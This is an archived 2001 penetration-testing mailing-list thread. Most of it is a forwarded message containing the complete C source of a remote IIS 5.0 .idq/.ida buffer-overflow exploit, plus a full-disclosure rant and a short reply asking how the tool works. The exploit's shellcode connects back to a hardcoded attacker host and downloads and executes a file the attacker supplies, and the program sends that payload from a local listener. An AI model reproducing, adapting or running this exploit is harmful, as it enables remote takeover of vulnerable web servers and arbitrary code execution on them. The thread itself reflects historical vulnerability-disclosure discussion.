Penetration Testing: Re: FWD: Re: .ida vulnerability..

From: cdowns <cdowns_at_skillsoft.com>
Date: Tue, 03 Jul 2001 11:06:14 -0400

well got it compiled with no problem but what the hell does <file> do ? tried
to overwrite a file in a writeable directory and then tried to create a file in
a writable directory ? hmmmmm something im not seeing here ? thanks

-D

Marc Maiffret wrote:

> This came across Steve's win2ksec mailing list almost a week or so ago. Not
> sure why none of the securityfocus mailing lists have picked it up (at least
> to my knowledge). Working remote IIS exploit for the .ida hole. Figured
> since you guys have had a discussion about writing a exploit for it etc...
> this might be helpful to you.
>
> Signed,
> Marc Maiffret
> Chief Hacking Officer
> eEye Digital Security
> T.949.349.9062
> F.949.349.9538
> http://eEye.com/Retina - Network Security Scanner
> http://eEye.com/Iris - Network Traffic Analyzer
> http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities
>
> ||> ----- Original Message -----
> ||> From: "Steve" <steve_at_SECURESOLUTIONS.ORG>
> ||> To: <win2ksecadvice_at_LISTSERV.NTSECURITY.NET>
> ||> Sent: Wednesday, June 27, 2001 2:57 PM
> ||> Subject: Fwd: Full Disclosure .ida exploit.
> ||>
> ||>
> ||> > This was sent to me a few minutes ago. Here is the code as posted to
> ||> Packet Storm and a rant by the person who brought it to my attention.
> ||While
> ||> I normally have tried to keep rants off of the mailing list, I
> ||have always
> ||> been very pro full disclosure and will do my best to defend it. Please
> ||> note, I have not verified this code to be functioning but will make an
> ||> attempt to later this evening. If anyone else has time (Ken? Mark?)
> ||please
> ||> do so and post to the list.
> ||> >
> ||> > -Steve
> ||> >
> ||> > /*
> ||> > IIS5.0 .idq overrun remote exploit
> ||> > Programmed by hsj : 01.06.21
> ||> >
> ||> > code flow:
> ||> > overrun -> jmp or call ebx -> jmp 8 ->
> ||> > check shellcode addr and jump to there ->
> ||> > shellcode -> make back channel -> download & exec code
> ||> > */
> ||> > #include <stdio.h>
> ||> > #include <stdlib.h>
> ||> > #include <string.h>
> ||> > #include <signal.h>
> ||> > #include <sys/types.h>
> ||> > #include <sys/socket.h>
> ||> > #include <sys/ioctl.h>
> ||> > #include <sys/time.h>
> ||> > #include <sys/wait.h>
> ||> > #include <errno.h>
> ||> > #include <unistd.h>
> ||> > #include <fcntl.h>
> ||> > #include <netinet/in.h>
> ||> > #include <limits.h>
> ||> > #include <netdb.h>
> ||> > #include <arpa/inet.h>
> ||> >
> ||> > #define RET 0x77e516de /* jmp or call ebx */
> ||> > #define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA
> ||*/
> ||> > #define GPADDRESS 0x77e59ac1 /* Address of
> |GetProcAddress */
> ||> > #define GMHANDLEA_OFFSET 24
> ||> > #define GPADDRESS_OFFSET 61
> ||> > #define OFFSET 234 /* exception handler offset */
> ||> > #define NOP 0x41
> ||> >
> ||> > #define MASKING 1
> ||> > #if MASKING
> ||> > #define PORTMASK 0x4141
> ||> > #define ADDRMASK 0x41414141
> ||> > #define PORTMASK_OFFSET 128
> ||> > #define ADDRMASK_OFFSET 133
> ||> > #endif
> ||> >
> ||> > #define PORT 80
> ||> > #define ADDR "attacker.mydomain.co.jp"
> ||> > #define PORT_OFFSET 115
> ||> > #define ADDR_OFFSET 120
> ||> > unsigned char shellcode[]=
> ||> > "\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0"
> ||> > "\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
> ||> > "\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88"
> ||> > "\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
> ||> > "\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8"
> ||> > "\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
> ||> > "\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66"
> ||> > "\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
> ||> > #if MASKING
> ||> > "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
> ||> > #endif
> ||> > "\x8B\x46\xF8\xFF\xD0\x33\xC0"
> ||> > "\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07"
> ||> > "\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
> ||> > "\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B"
> ||> > "\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
> ||> > "\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0"
> ||> > "\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";
> ||> >
> ||> > unsigned char storage[]=
> ||> > "\xEB\x02"
> ||> > "\xEB\x4E"
> ||> > "\xE8\xF9\xFF\xFF\xFF"
> ||> > "msvcrt.ws2_32.socket.connect.recv.closesocket."
> ||> > "_open._write._close._execl.";
> ||> >
> ||> > unsigned char forwardjump[]=
> ||> > "%u08eb";
> ||> >
> ||> > unsigned char jump_to_shell[]=
> ||> > "%uC033%uB866%u031F%u0340%u8BD8%u8B03"
> ||> > "%u6840%uDB33%u30B3%uC303%uE0FF";
> ||> >
> ||> > unsigned int resolve(char *name)
> ||> > {
> ||> > struct hostent *he;
> ||> > unsigned int ip;
> ||> >
> ||> > if((ip=inet_addr(name))==(-1))
> ||> > {
> ||> > if((he=gethostbyname(name))==0)
> ||> > return 0;
> ||> > memcpy(&ip,he->h_addr,4);
> ||> > }
> ||> > return ip;
> ||> > }
> ||> >
> ||> > int make_connection(char *address,int port)
> ||> > {
> ||> > struct sockaddr_in server,target;
> ||> > int s,i,bf;
> ||> > fd_set wd;
> ||> > struct timeval tv;
> ||> >
> ||> > s = socket(AF_INET,SOCK_STREAM,0);
> ||> > if(s<0)
> ||> > return -1;
> ||> > memset((char *)&server,0,sizeof(server));
> ||> > server.sin_family = AF_INET;
> ||> > server.sin_addr.s_addr = htonl(INADDR_ANY);
> ||> > server.sin_port = 0;
> ||> >
> ||> > target.sin_family = AF_INET;
> ||> > target.sin_addr.s_addr = resolve(address);
> ||> > if(target.sin_addr.s_addr==0)
> ||> > {
> ||> > close(s);
> ||> > return -2;
> ||> > }
> ||> > target.sin_port = htons(port);
> ||> > bf = 1;
> ||> > ioctl(s,FIONBIO,&bf);
> ||> > tv.tv_sec = 10;
> ||> > tv.tv_usec = 0;
> ||> > FD_ZERO(&wd);
> ||> > FD_SET(s,&wd);
> ||> > connect(s,(struct sockaddr *)&target,sizeof(target));
> ||> > if((i=select(s+1,0,&wd,0,&tv))==(-1))
> ||> > {
> ||> > close(s);
> ||> > return -3;
> ||> > }
> ||> > if(i==0)
> ||> > {
> ||> > close(s);
> ||> > return -4;
> ||> > }
> ||> > i = sizeof(int);
> ||> > getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
> ||> > if((bf!=0)||(i!=sizeof(int)))
> ||> > {
> ||> > close(s);
> ||> > errno = bf;
> ||> > return -5;
> ||> > }
> ||> > ioctl(s,FIONBIO,&bf);
> ||> > return s;
> ||> > }
> ||> >
> ||> > int get_connection(int port)
> ||> > {
> ||> > struct sockaddr_in local,remote;
> ||> > int lsock,csock,len,reuse_addr;
> ||> >
> ||> > lsock = socket(AF_INET,SOCK_STREAM,0);
> ||> > if(lsock<0)
> ||> > {
> ||> > perror("socket");
> ||> > exit(1);
> ||> > }
> ||> > reuse_addr = 1;
> ||> > if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char
> ||> *)&reuse_addr,sizeof(reuse_addr))<0)
> ||> > {
> ||> > perror("setsockopt");
> ||> > close(lsock);
> ||> > exit(1);
> ||> > }
> ||> > memset((char *)&local,0,sizeof(local));
> ||> > local.sin_family = AF_INET;
> ||> > local.sin_port = htons(port);
> ||> > local.sin_addr.s_addr = htonl(INADDR_ANY);
> ||> > if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)
> ||> > {
> ||> > perror("bind");
> ||> > close(lsock);
> ||> > exit(1);
> ||> > }
> ||> > if(listen(lsock,1)<0)
> ||> > {
> ||> > perror("listen");
> ||> > close(lsock);
> ||> > exit(1);
> ||> > }
> ||> > retry:
> ||> > len = sizeof(remote);
> ||> > csock = accept(lsock,(struct sockaddr *)&remote,&len);
> ||> > if(csock<0)
> ||> > {
> ||> > if(errno!=EINTR)
> ||> > {
> ||> > perror("accept");
> ||> > close(lsock);
> ||> > exit(1);
> ||> > }
> ||> > else
> ||> > goto retry;
> ||> > }
> ||> > close(lsock);
> ||> > return csock;
> ||> > }
> ||> >
> ||> > int main(int argc,char *argv[])
> ||> > {
> ||> > int i,j,s,pid;
> ||> > unsigned int cb;
> ||> > unsigned short port;
> ||> > char *p,buf[512],buf2[512],buf3[2048];
> ||> > FILE *fp;
> ||> >
> ||> > if(argc!=3)
> ||> > {
> ||> > printf("usage: $ %s ip file\n",argv[0]);
> ||> > return -1;
> ||> > }
> ||> > if((fp=fopen(argv[2],"rb"))==0)
> ||> > return -2;
> ||> >
> ||> > if(!(cb=resolve(ADDR)))
> ||> > return -3;
> ||> >
> ||> > if((pid=fork())<0)
> ||> > return -4;
> ||> >
> ||> > if(pid)
> ||> > {
> ||> > fclose(fp);
> ||> > s = make_connection(argv[1],80);
> ||> > if(s<0)
> ||> > {
> ||> > printf("connect error:[%d].\n",s);
> ||> > kill(pid,SIGTERM);
> ||> > return -5;
> ||> > }
> ||> >
> ||> > j = strlen(shellcode);
> ||> > *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;
> ||> > *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;
> ||> > port = htons(PORT);
> ||> > #if MASKING
> ||> > port ^= PORTMASK;
> ||> > cb ^= ADDRMASK;
> ||> > *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;
> ||> > *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;
> ||> > #endif
> ||> > *(unsigned short *)&shellcode[PORT_OFFSET] = port;
> ||> > *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
> ||> > for(i=0;i<strlen(shellcode);i++)
> ||> > {
> ||> > if((shellcode[i]==0x0a)||
> ||> > (shellcode[i]==0x0d)||
> ||> > (shellcode[i]==0x3a))
> ||> > break;
> ||> > }
> ||> > if(i!=j)
> ||> > {
> ||> > printf("bad portno or ip address...\n");
> ||> > close(s);
> ||> > kill(pid,SIGTERM);
> ||> > return -6;
> ||> > }
> ||> >
> ||> > memset(buf,1,sizeof(buf));
> ||> > p = &buf[OFFSET-2];
> ||> > sprintf(p,"%s",forwardjump);
> ||> > p += strlen(forwardjump);
> ||> > *p++ = 1;
> ||> > *p++ = '%';
> ||> > *p++ = 'u';
> ||> > sprintf(p,"%04x",(RET>>0)&0xffff);
> ||> > p += 4;
> ||> > *p++ = '%';
> ||> > *p++ = 'u';
> ||> > sprintf(p,"%04x",(RET>>16)&0xffff);
> ||> > p += 4;
> ||> > *p++ = 1;
> ||> > sprintf(p,"%s",jump_to_shell);
> ||> >
> ||> > memset(buf2,NOP,sizeof(buf2));
> ||> >
> ||>
> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],stor
> ||age,strle
> ||> n(storage));
> ||> >
> ||>
> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(she
> ||llcode));
> ||> > buf2[sizeof(buf2)-1] = 0;
> ||> >
> ||> > sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell:
> ||> %s\r\n\r\n",buf,buf2);
> ||> > write(s,buf3,strlen(buf3));
> ||> >
> ||> > printf("---");
> ||> > for(i=0;i<strlen(buf3);i++)
> ||> > {
> ||> > if((i%16)==0)
> ||> > printf("\n");
> ||> > printf("%02X ",buf3[i]&0xff);
> ||> > }
> ||> > printf("\n---\n");
> ||> >
> ||> > wait(0);
> ||> > sleep(1);
> ||> > shutdown(s,2);
> ||> > close(s);
> ||> >
> ||> > printf("Done.\n");
> ||> > }
> ||> > else
> ||> > {
> ||> > s = get_connection(PORT);
> ||> > j = 0;
> ||> > while((i=fread(buf,1,sizeof(buf),fp)))
> ||> > {
> ||> > write(s,buf,i);
> ||> > j += i;
> ||> > printf(".");
> ||> > fflush(stdout);
> ||> > }
> ||> > fclose(fp);
> ||> > printf("\n%d bytes send...\n",j);
> ||> >
> ||> > shutdown(s,2);
> ||> > close(s);
> ||> > }
> ||> >
> ||> > return 0;
> ||> > }
> ||> >
> ||> >
> ||> >
> ||> >
> ||> > >From: fuq69rc_at_hushmail.com
> ||> > >Date: Wed, 27 Jun 2001 13:17:57 -0800 (PDT)
> ||> > >To: steve_at_SECURESOLUTIONS.ORG
> ||> > >Subject: Full Disclosure .ida exploit.
> ||> > >
> ||> > >Steve I hope you let this through you your win2k mailing list. I know
> ||its
> ||> > >a bit of a rant but I think it needs to be said and also the
> |fact that
> ||> there
> ||> > >is a link to the .ida exploit should be worth while enough. Thanks.
> ||> > >-----
> ||> > >Isn't it strange that a gift can be an enemy? That a
> ||privilege can be a
> ||> > >chore. Maybe its just me but security is going nowhere fast because
> ||> everyone
> ||> > >is to busy looking at the ten thousand foot view instead of getting
> ||down,
> ||> > > getting their hands dirty, and fixing the problem at its core.
> ||> > >
> ||> > >I see everyone trying to run around and figure out what to do
> ||about the
> ||> > >hax0rs and the script kiddies. Bureaucrats and has never
> |been security
> ||> experts
> ||> > >are all looking to form organizations that they hope will cut down on
> ||the
> ||> > >"threat" of vulnerability exposure, when thats not the real problem.
> ||> Software
> ||> > >companies writing insecure software IS the problem.
> ||> > >
> ||> > >Who gets shit on in the end? The hackers and researchers
> |putting their
> ||> own
> ||> > >time into finding vulnerabilities in software thats been developed by
> ||> multi-
> ||> > >billion dollar software companies. These same hackers and researchers
> ||who
> ||> > >have done all of this work for FREE, to help the security community.
> ||They
> ||> > >end up being the ones that get shit on for releasing this information
> ||to
> ||> > >the masses so that they might help educate people about security
> ||> vulnerabilities
> ||> > >and keep software companies on their toes and honest about
> ||the security
> ||> > >issues that affect their software.
> ||> > >
> ||> > >Most software companies do not take security seriously, regardless of
> ||> what
> ||> > >they say, because the bean counters at most software companies never
> ||see
> ||> > >an ROI (Return on Investment) for adding much needed security
> ||mechanisms
> ||> > >to their security software. Why not? because honestly not
> ||enough people
> ||> > >are standing up and demanding for a change. Instead the majority of
> ||> administrators,
> ||> > > NT at least, tend to just laugh and say, for example, "Ahh haha
> ||another
> ||> > >MS hole, what's new" and then proceed to shrug it off, stay
> |bent over,
> ||> and
> ||> > >keep taking it from software companies.
> ||> > >
> ||> > >Also for those administrators that actually do care about security
> ||you'll
> ||> > >tend to find that a lot of them are actually paranoid about
> |installing
> ||> security
> ||> > >patches from companies like Microsoft because they've had a
> |really bad
> ||> track
> ||> > >record on creating patches that end up breaking and then need patches
> ||> themselves.
> ||> > >So the administrators end up waiting for the next service pack (which
> ||> leaves
> ||> > >them vulnerable), UNLESS they have a full disclosure example exploit
> ||that
> ||> > >first hand shows them how serious the vulnerability is, at
> |which point
> ||I
> ||> > >promise you they WILL install the patch.
> ||> > >
> ||> > >I could go on forever about the circles the security industry is
> ||running
> ||> > >in or how 80% of the "security experts" have never done ANYTHING to
> ||help
> ||> > >security (hi russ!!) besides spout off their mouth about topics they
> ||> usually
> ||> > >have never really experienced first hand.
> ||> > >
> ||> > >A handful of people, like Russ Cooper, have said that when people
> ||release
> ||> > >non-malicious example exploits that it makes it easier for people to
> ||take
> ||> > >those exploits and tweak them into doing bad things. That is
> ||completely
> ||> > >inaccurate and its a statement being made by someone who
> |wouldn't know
> ||> what
> ||> > >an exploit was if shellcode slapped him in the face.
> ||> > >
> ||> > >I came across this the other day on packetstorm. Working .ida exploit
> ||> which
> ||> > >is probably one of the first publicly released, although as
> ||always when
> ||> > >any big hole is released and you don't see exploits on
> |Bugtraq or what
> ||> not
> ||> > >that MEANS thats because people aren't sharing their exploits with
> ||> everyone
> ||> > >but they are out there and most likely being used.
> ||> > >
> ||> >
> ||>
> ||>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&u
> ||name=anon
> ||> ymous&datopic=General&mesgcheck=defined&gum=3087&editoron=
> ||> > >
> ||> > >There is a whole other world out there that few people can even begin
> ||to
> ||> > >understand. Exploits are created daily for all types of
> ||vulnerabilities
> ||> > >that people might have a use for. Just because you dont see it on the
> ||> handful
> ||> > >of security mailing lists, or because CERT, NIPC, or Russ Cooper have
> ||not
> ||> > >heard about it does not mean it is not there.
> ||> > >
> ||> > >All those opposed to full disclosure, be damned. For to resist is to
> ||piss
> ||> > >against the wind and all who do will end up smelling.
> ||> > >Free, encrypted, secure Web-based email at www.hushmail.com
> ||> >
> ||> > _____________________________________________________________________
> ||> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
> ||> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
> ||> > SEND ALL COMMANDS TO: listserv_at_listserv.ntsecurity.net
> ||> >
> ||>
> ||>
> ||
> ||

--
------------------------------
    Christopher M Downs
Network Security Administrator
   Skillsoft Corporation
    cdowns_at_skillsoft.com
"Micro$oft typed backwards
      spells "c:\duh /?"
------------------------------
--------------------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Received on Jul 03 2001